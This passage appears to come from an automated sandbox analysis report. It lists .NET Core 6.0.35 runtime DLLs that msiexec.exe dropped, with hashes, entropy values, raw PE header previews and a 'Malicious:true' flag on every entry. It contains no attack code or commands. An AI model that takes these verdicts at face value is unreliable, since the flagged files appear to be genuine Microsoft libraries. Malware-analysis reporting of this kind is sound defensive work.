                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...s.6..........." ..0..............,... ...@....... ..............................SS....`..................................,..O....@...................)...`.......+..T............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................,......H.......P ......................H+......................................BSJB............v4.0.30319......l.......#~..<...X...#Strings............#US.........#GUID.......P...#Blob............T.........3..........................................o...........w...7.w...v.d...........U.........~.....B.................a...................................".....\.H.....w.................^.....^.....^...).^...1.^...9.^...A.^...I.^...Q.^...Y.^...a.^...i.^...q.^...y.^.....^. ...^.....^...

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Text.Encoding.CodePages.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):871176
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.50414684491355
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:L47xn7kZQ6kliVreJIHHr0tRYbKr2KtG9VKABC6rPfREDfP7/1qiVhIWCC:LK9km6k/IwRYbiBeKGCUREDrZV2hC
                                                                                                                                                                                                                                                                                                                                  MD5:9D199E9F27CB473674BAB5BFC70F6871
                                                                                                                                                                                                                                                                                                                                  SHA1:F7069C033BB340E81C1BE7BD4BC062EE21347B09
                                                                                                                                                                                                                                                                                                                                  SHA-256:5FA8A35279B15DE005337AC2B59CDE11A147C21143B12564A453F1CD44566170
                                                                                                                                                                                                                                                                                                                                  SHA-512:D46DA52295442A82DFDD6BD3CBB2949A79CD8B51B31EB1E176476E455D216D1C7ED55ED6F4B44289A3081C8A9C06020DE29C8F0D0D22CA40AAC117D043F740CF
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....g_..........." .........&...............................................P............`...@......@............... ......................................LJ..L...."...)...@......."..T...............................................................H............text............................... ..`.data.... ......."..................@....reloc.......@......................@..B............................................0...........................D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0.........C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Text.Encoding.Extensions.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16144
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.7268764981814115
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:mNZvlXIW6zJWUYA6VFHRN7cUvY2IR9zoOaC:4s1FClZvbU9z3X
                                                                                                                                                                                                                                                                                                                                  MD5:DB5F67EC7D4CEFE625549E650C2B783D
                                                                                                                                                                                                                                                                                                                                  SHA1:0EE4FB5F26575B570122AE3C9A184DDD0B3EBA49
                                                                                                                                                                                                                                                                                                                                  SHA-256:3CC4AFFE60DC1DE5F66706B39A24D7E96D708A463A9A92A05288D6BA246E09E5
                                                                                                                                                                                                                                                                                                                                  SHA-512:4D86E8E161CEFB0596F1D98D52D18107CE51D6155D42C1BDDC200710BCA88317B01B2E0E84C39E85E7E70E9023B2AFB2E79737F3ED32973EB0D3106806F4247A
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n............."!..0.............n*... ........@.. ..............................\.....`..................................*..O....@...................)...`......\)..8............................................ ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................P*......H........ ......................P ......................................Q.(..e.NMO`._jh[......Js....o H.......0-.....w S...a...6.T..q../..0........,)..@LqS<.......a....hG.X-.o..3./.!...~#.{>.p0.B[...BSJB............v4.0.30319......`... ...#~......H...#Strings............#GUID...........#Blob......................3......................................v.........I...........b.............H.........$.....b...........H...................................i.....v...................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Text.Encoding.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16160
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.78497387239177
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:d+gBIojxxXjWfPNWRxWxNzx95jmHnhWgN7agWQY/TAgfcMbnoQNpX01k9z3Abte9:dJNjWfPNWRaX6HRN7sT/7R9zCS
                                                                                                                                                                                                                                                                                                                                  MD5:3E33747D79B6584609C60EF5A8318F5A
                                                                                                                                                                                                                                                                                                                                  SHA1:BCA2F7FBF2E45DC02C40C263FEE708624C9102AC
                                                                                                                                                                                                                                                                                                                                  SHA-256:068F309AC98BD15B1EFF243759661CC21F30E1B4CC02CCF8317233FA31D3B7CA
                                                                                                                                                                                                                                                                                                                                  SHA-512:4624C53E6E7F02E4A064FD0239C0B4B8B18A325470E9DFE051600E2CE7B1B53F7C18D5D51BAE978FA2216E0ADD928346EDA41D4F210A3556C7A7761B5D257E83
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...q.{..........."!..0..............+... ........@.. ....................................`.................................P+..K....@.................. )...`.......*..8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................+......H........ ......................P ........................................M...V_.".....Y.).......lLj3..l.oh.,...R.M7....Mx.*q.cV]...L.n=..^..1.x...#c...Q...~..m8.y...ACz3.X.k...[.8A.g.n.b}.....BSJB............v4.0.30319......`.......#~..........#Strings............#GUID...,.......#Blob......................3................................................"...........;...........f.............................!...........[.......................B.....O.....v.............

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Text.Encodings.Web.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):131376
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.512717394823719
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:ze6mI/UjfYxSwKqqOAl/Rn0nzg9RaBiTV:q77jfY8BSza2iV
                                                                                                                                                                                                                                                                                                                                  MD5:F596694C6924FFA61DD21A0F36FDD0BD
                                                                                                                                                                                                                                                                                                                                  SHA1:21C64C8FBDC2AB6065E70E6A500537137FEF60FD
                                                                                                                                                                                                                                                                                                                                  SHA-256:146CC7B373565F4B88558690F9B2132CC308719C72AC2603F7199E0EC6A21FE7
                                                                                                                                                                                                                                                                                                                                  SHA-512:36644B0A2842C8BD5A7EA6F6F435916FD9ADE2F3039AA7C7652E6EA85E41019B0D9470DFA7B1D99A766FE9332521D87605E644FAF9749060C2016277BE89DB66
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...}.&..........." ......................................................................`...@......@............... .......................................0..........0)......,...h...T...............................................................H............text............................... ..`.data...K...........................@....reloc..,...........................@..B............................................0...........................\.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...Z.!...C.o.m.m.e.n.t.s...P.r.o.v.i.d.e.s. .t.y.p.e.s. .f.o.r. .e.n.c.o.d.i.n.g. .a.n.d. .e.s.c.a.p.i.n.g. .s.t.r.i.n.g.s. .f.o.r. .u.s.e. .i.n. .J.a.v.a.S.c.r.i.p.t.,. .H.y.p.e.r.T.e.x.t. .M.a.r.k.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Text.Json.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1486120
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.807053388231781
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:BMUw61/OBH5KoaypUegQ/INE5bk9u7hInuKqO:C6mwZAUegqINGg3uY
                                                                                                                                                                                                                                                                                                                                  MD5:4281F86C7DA4EC32A1579D04D1A34467
                                                                                                                                                                                                                                                                                                                                  SHA1:B6D46920575587878DB36A68FEDFA6FEF09A2A27
                                                                                                                                                                                                                                                                                                                                  SHA-256:0EFF9FFCA65F556D8BE24E4EDDA1D08640A6D040082B8D34B993EC292BAC10FF
                                                                                                                                                                                                                                                                                                                                  SHA-512:697E0BA5BF9B97C300E5B66E61608285C1CE0E4B48B52C5BAF5CA33FB0D405F72E2AA5A50C7E6E6B8C5A7D922232189E1EC26F2B967977B74579572D3B772133
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................." .....8...J............................................................`...@......@............... .........................................L.......()..........HP..T...............................................................H............text...x6.......8.................. ..`.data...O....P...0...:..............@....reloc...............j..............@..B............................................0...........................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0.....I...C.o.m.m.e.n.t.s...P.r.o.v.i.d.e.s. .h.i.g.h.-.p.e.r.f.o.r.m.a.n.c.e. .a.n.d. .l.o.w.-.a.l.l.o.c.a.t.i.n.g. .t.y.p.e.s. .t.h.a.t. .s.e.r.i.a.l.i.z.e. .o.b.j.e.c.t.s. .t.o. .J.a.v.a.S.c.r.i.p.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Text.RegularExpressions.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):530184
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.7797079476090305
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:fDaJSWfE1hvpmzn7z/HpVxn87bC/m+VvHKHhiKpwR4wcMPVZ22xS+yLARBf:DW2Yzn7z/HpVxn87e/m6CHhUPVZ2iOL4
                                                                                                                                                                                                                                                                                                                                  MD5:0F128F48BAB6D1D52889BE2FF1EEFED0
                                                                                                                                                                                                                                                                                                                                  SHA1:06A028FABC2691AF5F2E5A661FB78075A0C1C2D8
                                                                                                                                                                                                                                                                                                                                  SHA-256:CBA15580E79FEC0A44337BAD40F35285ABA0C7A02E43EB84EEC3415738105CDF
                                                                                                                                                                                                                                                                                                                                  SHA-512:123C019921C949112A2A944D2A441FF53E7B09E6E14E239656F25B22EDE5520E5DAB877041F8A144F608D4AA3D2E0BA0C4EDE65ED928D5FF7BA63F585534CE55
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................." .....|...p......................................................=&....`...@......@............... ......................................|...|).......)..........0)..T...............................................................H............text....z.......|.................. ..`.data....f.......h...~..............@....reloc..............................@..B............................................0...........................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...V.....C.o.m.m.e.n.t.s...S.y.s.t.e.m...T.e.x.t...R.e.g.u.l.a.r.E.x.p.r.e.s.s.i.o.n.s.....L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...f.....F.i.l.e.D.e.s.c.r.i.p.t.i.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Threading.Channels.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):125208
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.692637451202541
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:jzHXIurk9aiG9fxBFXRPxlhzKhtTwg8AHWDV5yWR63:n3E695BFXRplhOzwDDjRM
                                                                                                                                                                                                                                                                                                                                  MD5:CB464FDA974470435C4CA140B4FADA57
                                                                                                                                                                                                                                                                                                                                  SHA1:D19EAB3F2D239CB5DF052757838D33332317C136
                                                                                                                                                                                                                                                                                                                                  SHA-256:EC11B988107C97601DE33DEF84F7259A36BC3007FFD9CDB584891114F9B41E46
                                                                                                                                                                                                                                                                                                                                  SHA-512:AEBC1EAA4B2687D24C8A5B408AB16D153B576B9832F41A553F28D576D545451D2259EDBD63960D9D7AD3723D3BA5CE36346089A77E515AB807FA9CD521ED7711
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................" .........*......................................................).....`...@......@............... ......................................T7...........)..............T...............................................................H............text............................... ..`.data....%.......&..................@....reloc..............................@..B............................................0...........................8.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o...t.....0.0.0.0.0.4.b.0...8.....C.o.m.m.e.n.t.s...P.r.o.v.i.d.e.s. .t.y.p.e.s. .f.o.r. .p.a.s.s.i.n.g. .d.a.t.a. .b.e.t.w.e.e.n. .p.r.o.d.u.c.e.r.s. .a.n.d. .c.o.n.s.u.m.e.r.s...........C.o.m.m.o.n.l.y. .U.s.e.d. .T.y.p.e.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Threading.Overlapped.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16136
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.733717704448286
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:fDt+HYCHcXuHV2HDHtWcNHWZYA6VFHRN7V04MR9z2WA:TzeFClVU9zxA
                                                                                                                                                                                                                                                                                                                                  MD5:05AF5514B2968C6042C5B14CB5401F23
                                                                                                                                                                                                                                                                                                                                  SHA1:3B5825931632C7CA230CA1FABD9EBAD1C8304EB3
                                                                                                                                                                                                                                                                                                                                  SHA-256:5C1B1C2129E8A201CB583F6595BFD9339D2A6D52F4F371C8013C85147EC94E32
                                                                                                                                                                                                                                                                                                                                  SHA-512:58F41A7BE222226A3BEF4271DF0555C6B6C3668C007153C98ECC422D0113F50FDABA0036A2F285D625B5D93E7DCB3F17BC9AA2C8E1193C353D6453504FFA1AD9
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c............."!..0.............n*... ........@.. ..............................."....`..................................*..W....@...................)...`......\)..8............................................ ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................P*......H........ ......................P .......................................3.2.]].4..k...)~ys.t...2.>=..+W.3.l. ..Q..9...."......>drf.mAz..*.=.g..\|EDps.......m..m.c.v%...yJ'-..E...6...*s]:...j.....BSJB............v4.0.30319......`.......#~..x...H...#Strings............#GUID...........#Blob......................3......................................................4...........7.......c.........t.....}.......c...V.....{.................9.....................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Threading.Tasks.Dataflow.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):505608
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.7763170175701335
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:Q5EzXX03uPIhSTcNO/LSsjM5REz4sr4CGFHD6ioscEu/L2SJkSGskfT5v3P1m9rM:Q5Ib0CGFHuioHEdS2vBb5v30COTxwZ
                                                                                                                                                                                                                                                                                                                                  MD5:E332D97CC4AE5DFC6606640A64E7A766
                                                                                                                                                                                                                                                                                                                                  SHA1:ED7C0E78AEC95A6AE10F9DFA7B62728C06E4744A
                                                                                                                                                                                                                                                                                                                                  SHA-256:3411CCC0B6BA1FF70D550A8B7D2D3A373A79584B36C90C06D7BF400AA74EB39A
                                                                                                                                                                                                                                                                                                                                  SHA-512:900ACB2D761A285D7F0E97C9F548D166535329F722D99B285715F284C0C1392AFBEFF44A9E67DA2DF2866177A6778CA9D4F038C3EFF5560B872DB4398D56F5D8
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d..............." .................................................................6....`...@......@............... ..................................l.......HB.......)..........x"..T...........................................................p...H............text............................... ..`.data...J...........................@....reloc..............................@..B............................................0.......................\.....4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........t.....S.t.r.i.n.g.F.i.l.e.I.n.f.o...P.....0.0.0.0.0.4.b.0.........C.o.m.m.e.n.t.s...T.P.L. .D.a.t.a.f.l.o.w. .p.r.o.m.o.t.e.s. .a.c.t.o.r./.a.g.e.n.t.-.o.r.i.e.n.t.e.d. .d.e.s.i.g.n.s. .t.h.r.o.u.g.h. .p.r.i.m.i.t.i.v.e.s. .f.o.r. .i.n.-.p.r.o.c.e.s.s. .m.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Threading.Tasks.Extensions.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16136
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.821262984361922
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:Z7z05p091rcmOD5RnGWSNXW0YA6VFHRN7xWMR9z2cO:Z7gAuEPFClz9zq
                                                                                                                                                                                                                                                                                                                                  MD5:7175CFF820ACB9389C713410DD582063
                                                                                                                                                                                                                                                                                                                                  SHA1:F1C47E2B46084FEFFB44BB88D51A3932FB1F3042
                                                                                                                                                                                                                                                                                                                                  SHA-256:D060226E814A1DDF9F607AFAE51F7D5698F8E435A63FCE107E78239E349BA2AC
                                                                                                                                                                                                                                                                                                                                  SHA-512:BCDEBAE2F49084BC3F5AB9097715235E6C0A2257A783B14EAE49F2BA16DD59DA87CDE24DF5CEE6732194F8146B34B0ED4428BC2847E5ACCDA95FF637EC32A5CD
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?x............"!..0..............+... ........@.. ..............................l.....`..................................+..K....@...................)...`.......*..8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................+......H........ ......................P ...............................................W'Z.H......l..j.d....&v..j..\.Q_u...]><{Hr..1.+K....L..=........N.....3.M..."*B.8Q.e.....3.~:..L...Qs]..3........jg|BSJB............v4.0.30319......`.......#~......8...#Strings....(.......#GUID...8.......#Blob......................3..................................................z...v.z.....H...............G.......[.....[...............]..........._...........9................./.z.....p.....

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Threading.Tasks.Parallel.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):139024
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.702745878398023
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:brCD+EGnNfGAKUDXxT3LBzdQZ4/FJg9C5OR291oVcJUQz:Hw9GNGAKUbxxzKZ8zaCUQ
                                                                                                                                                                                                                                                                                                                                  MD5:906D0531114C584A2E5EA50BDA99DDC2
                                                                                                                                                                                                                                                                                                                                  SHA1:FF650B1743C72683BC0019DB15332D01DE6ED993
                                                                                                                                                                                                                                                                                                                                  SHA-256:BF2C3F9EBC2A48493796F4002984F43E4630A2DB3FD26F70BD79355F3FF1D563
                                                                                                                                                                                                                                                                                                                                  SHA-512:9F50718BA3C3EC370D3AFAB850B962539CD3C84FC222485DE68289129C0443DD880B86CFED46F68CB9860CB8984E9C09386D3B756B908E160FE55CBEEC2D47AD
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....\..........." .........*............................................... ...........`...@......@............... .......................................;..(........)..............T...............................................................H............text...b........................... ..`.data....%.......&..................@....reloc..............................@..B............................................0...........................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...X. ...C.o.m.m.e.n.t.s...S.y.s.t.e.m...T.h.r.e.a.d.i.n.g...T.a.s.k.s...P.a.r.a.l.l.e.l...L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...h. ...F.i.l.e.D.e.s.c.r.i.p.t.i.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Threading.Tasks.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):17192
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.7117476098810185
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:5vCj4AG3tNKiuqFzTR9WHRzWGwYA6VFHRN729WR9zjD:9Cj4LNRuN7wFClF9z/
                                                                                                                                                                                                                                                                                                                                  MD5:0822C689624C42040E5E6F38752AF2C8
                                                                                                                                                                                                                                                                                                                                  SHA1:21002E79AE998FC7B5453C77F09CB036710DBEAD
                                                                                                                                                                                                                                                                                                                                  SHA-256:E9B81690E9D7B3D67C32EB5948D63CC3E1136FF8FA19A19F2A0F5572FF6F8788
                                                                                                                                                                                                                                                                                                                                  SHA-512:1D5D2606C5FEB76EC2187098090DD928C4491EA69A5A46BD5ADAFD2EB8052CAE050F473AA8C078061965960CCBD126543B684EA18EA3D9DD50B8C1C8D0D057D4
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....L..........."!..0............../... ........@.. ..............................}.....`.................................h/..S....@..................()...`..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................./......H........ ......................P ......................................c.-..6.....f.7.......Y..C..{,.K..V[v|..P....t"......[c@.......l.,.tB.^K.i...$D...M.f.+..Vn.J......l.#......_.b.....S.iP..BSJB............v4.0.30319......`...P...#~......|...#Strings....,.......#GUID...<.......#Blob......................3................................/.....Y.........\.7.....7...u.....W.......&.....t...7.....@...........[...................................|.............7...........

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Threading.Thread.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16144
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.760009477775305
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:x6z2EZZV7DiWcZ7WjYA6VFHRN7/QD9R9zrJR+:axa0FClYb9zG
                                                                                                                                                                                                                                                                                                                                  MD5:3661BDD366B6EE1834577CB553D41C88
                                                                                                                                                                                                                                                                                                                                  SHA1:35DB9E13602F99C97F505E12624EFF3E873FD553
